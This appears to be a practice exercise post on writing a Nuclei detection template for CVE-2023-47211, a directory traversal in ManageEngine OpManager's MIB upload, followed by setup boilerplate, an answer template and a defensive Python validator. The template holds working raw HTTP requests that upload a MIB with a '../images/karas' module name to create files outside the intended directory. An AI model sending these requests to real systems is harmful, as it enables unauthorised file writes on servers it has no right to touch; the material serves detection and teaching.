Nuclei Templates Practice Problem - CVE-2023-47211
Posted on May 12, 2024 at 10:31:58. Author: IIIIIIIIIIIIIIIIIIIIl
Find the root cause of the vulnerability in the problem description below and write a Nuclei template for it.
Vulnerability Overview
A directory traversal vulnerability exists in the uploadMib functionality of ManageEngine OpManager 12.7.258. A specially crafted HTTP request can lead to arbitrary file creation. An attacker can send a malicious MiB file to trigger this vulnerability.
Setting Up the Environment
Installing on Windows
Prerequisites: Check the system requirements for OpManager before you begin the installation.
- Download OpManager for Windows.
- Learn how to install OpManager Essential edition here
- Learn how to install OpManager Enterprise edition here
Installing OpManager on Linux
Prerequisites: Check the system requirements for OpManager before you begin the installation.
- Learn how to install OpManager Essential edition here
- Learn how to install OpManager Enterprise edition here
Uninstalling OpManager
- To uninstall OpManager from a Windows machine, try Start > Programs > ManageEngine OpManager > Uninstall OpManager.
- To uninstall OpManager from a Linux machine, execute the command ./uninstaller.bin from the /bin/_uninst directory under OpManager installation.
Installing Applications Monitoring plug-in
- Check your build number and download the Application Monitoring plug-in here.
- Shut down OpManager before installing the plug-in.
- Double click OpManager's APM plug-in exe file. (You have to install APM plug-in in OpManager server only)
- Follow the on-screen instructions to complete the installation process.
- Click Finish. The plug-in has been installed successfully.
Uninstalling Applications Monitoring plug-in
- From the Control Panel open Add/Remove Programs
- Select ManageEngine APM plug-in and click Change/Remove button.
- Click Yes to confirm to uninstall the plug-in.
- Click Finish. The plug-in has been uninstalled successfully.
Upgrading OpManager
Different types of OpManager upgrades are periodically released. These include Service Packs, Upgrade Packs, and Migration Packs. Download the latest OpManager release here.
Answer template (try it yourself first, and look only if you get stuck)
```yaml
id: CVE-2023-47211

info:
  name: ManageEngine OpManager - Directory Traversal
  author: gy741
  severity: high
  description: |
    A directory traversal vulnerability exists in the uploadMib functionality of ManageEngine OpManager 12.7.258. A specially crafted HTTP request can lead to arbitrary file creation. An attacker can send a malicious MiB file to trigger this vulnerability.
  reference:
    - https://talosintelligence.com/vulnerability_reports/TALOS-2023-1851
    - https://nvd.nist.gov/vuln/detail/CVE-2023-47211
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 8.6
    cve-id: CVE-2023-47211
    cwe-id: CWE-22
    epss-score: 0.000610000
    epss-percentile: 0.238320000
    cpe: cpe:2.3:a:zohocorp:manageengine_firewall_analyzer:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    shodan-query: http.title:"OpManager Plus"
  tags: cve,cve2023,zoho,manageengine,authenticated,traversal,lfi

http:
  - raw:
      # Request 1: log in with the supplied credentials.
      - |
        POST /two_factor_auth HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        j_username={{username}}&j_password={{password}}

      # Request 2: upload a MIB whose module name contains "../".
      - |
        POST /client/api/json/mibbrowser/uploadMib HTTP/1.1
        Host: {{Hostname}}
        X-ZCSRF-TOKEN: opmcsrftoken={{x_zcsrf_token}}
        Content-Type: multipart/form-data; boundary=---------------------------372334936941313273904263503262

        -----------------------------372334936941313273904263503262
        Content-Disposition: form-data; name="mibFile"; filename="karas.txt"
        Content-Type: text/plain

        ../images/karas DEFINITIONS ::= BEGIN

        IMPORTS enterprises FROM RFC1155-SMI;

        microsoft OBJECT IDENTIFIER ::= { enterprises 311 }
        software OBJECT IDENTIFIER ::= { microsoft 1 }
        systems OBJECT IDENTIFIER ::= { software 1 }
        os OBJECT IDENTIFIER ::= { systems 3 }
        windowsNT OBJECT IDENTIFIER ::= { os 1 }
        windows OBJECT IDENTIFIER ::= { os 2 }
        workstation OBJECT IDENTIFIER ::= { windowsNT 1 }
        server OBJECT IDENTIFIER ::= { windowsNT 2 }
        dc OBJECT IDENTIFIER ::= { windowsNT 3 }

        END
        -----------------------------372334936941313273904263503262--

      # Request 3: the same upload again; the matcher below looks for the
      # "already exists" response to this repeat.
      - |
        POST /client/api/json/mibbrowser/uploadMib HTTP/1.1
        Host: {{Hostname}}
        X-ZCSRF-TOKEN: opmcsrftoken={{x_zcsrf_token}}
        Content-Type: multipart/form-data; boundary=---------------------------372334936941313273904263503262

        -----------------------------372334936941313273904263503262
        Content-Disposition: form-data; name="mibFile"; filename="karas.txt"
        Content-Type: text/plain

        ../images/karas DEFINITIONS ::= BEGIN

        IMPORTS enterprises FROM RFC1155-SMI;

        microsoft OBJECT IDENTIFIER ::= { enterprises 311 }
        software OBJECT IDENTIFIER ::= { microsoft 1 }
        systems OBJECT IDENTIFIER ::= { software 1 }
        os OBJECT IDENTIFIER ::= { systems 3 }
        windowsNT OBJECT IDENTIFIER ::= { os 1 }
        windows OBJECT IDENTIFIER ::= { os 2 }
        workstation OBJECT IDENTIFIER ::= { windowsNT 1 }
        server OBJECT IDENTIFIER ::= { windowsNT 2 }
        dc OBJECT IDENTIFIER ::= { windowsNT 3 }

        END
        -----------------------------372334936941313273904263503262--

    host-redirects: true
    max-redirects: 3

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains(body, "MIBFile with same name already exists")'
        condition: and

    # Internal extractor: takes the CSRF token from the Set-Cookie header so
    # the upload requests can send it back in X-ZCSRF-TOKEN.
    extractors:
      - type: regex
        name: x_zcsrf_token
        group: 1
        part: header
        regex:
          - 'Set-Cookie: opmcsrfcookie=([^;]{50,})'
        internal: true
```
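A server-side check for the flaw this template exercises, as an added example (not code from the original post or from OpManager). It assumes the upload handler names the stored file after the MIB module identifier, which is what the `../images/karas DEFINITIONS ::= BEGIN` line in the template body relies on; `MIB_DIR`, the allow-list and all function names are hypothetical.

```python
import re
from pathlib import Path

MIB_DIR = Path("/opt/example/mibs")  # hypothetical storage directory (assumption)
# Allow-list for module names: a policy assumption, not OpManager's own rule.
NAME_OK = re.compile(r"[A-Za-z][A-Za-z0-9-]{0,63}")
HEADER = re.compile(r"(\S+)\s+DEFINITIONS\s*::=\s*BEGIN")

def module_name(mib_text: str) -> str:
    """Return the raw token that precedes 'DEFINITIONS ::= BEGIN'."""
    without_comments = re.sub(r"--.*", "", mib_text)  # drop ASN.1 '--' comments
    match = HEADER.search(without_comments)
    if match is None:
        raise ValueError("no MIB module header found")
    return match.group(1)

def safe_mib_path(mib_text: str, mib_dir: Path = MIB_DIR) -> Path:
    """Map an uploaded MIB to its storage path, or raise ValueError."""
    name = module_name(mib_text)
    if not NAME_OK.fullmatch(name):  # rejects '/', '\\', '.', NUL and similar
        raise ValueError(f"rejected module name: {name!r}")
    base = mib_dir.resolve()
    target = (base / name).resolve()
    if target.parent != base:  # second layer: catches symlinked entries
        raise ValueError(f"path escapes {base}: {target}")
    return target

def accepts(mib_text: str) -> bool:
    """True when the upload would be stored, False when it is rejected."""
    try:
        safe_mib_path(mib_text)
        return True
    except ValueError:
        return False

# Constructed samples; the first reuses the header line from the template body.
TRAVERSAL = ("../images/karas DEFINITIONS ::= BEGIN\n"
             "IMPORTS enterprises FROM RFC1155-SMI;\nEND\n")
BENIGN = "-- constructed sample\nEXAMPLE-MIB DEFINITIONS ::= BEGIN\nEND\n"

if __name__ == "__main__":
    for label, text in (("traversal", TRAVERSAL), ("benign", BENIGN)):
        verdict = "accepted" if accepts(text) else "rejected"
        print(f"{label}: module name {module_name(text)!r} -> {verdict}")
```

The allow-list does the real work: the name is validated before it is ever joined to a directory, so the containment check only has to cover cases such as a symlink already sitting in the MIB directory.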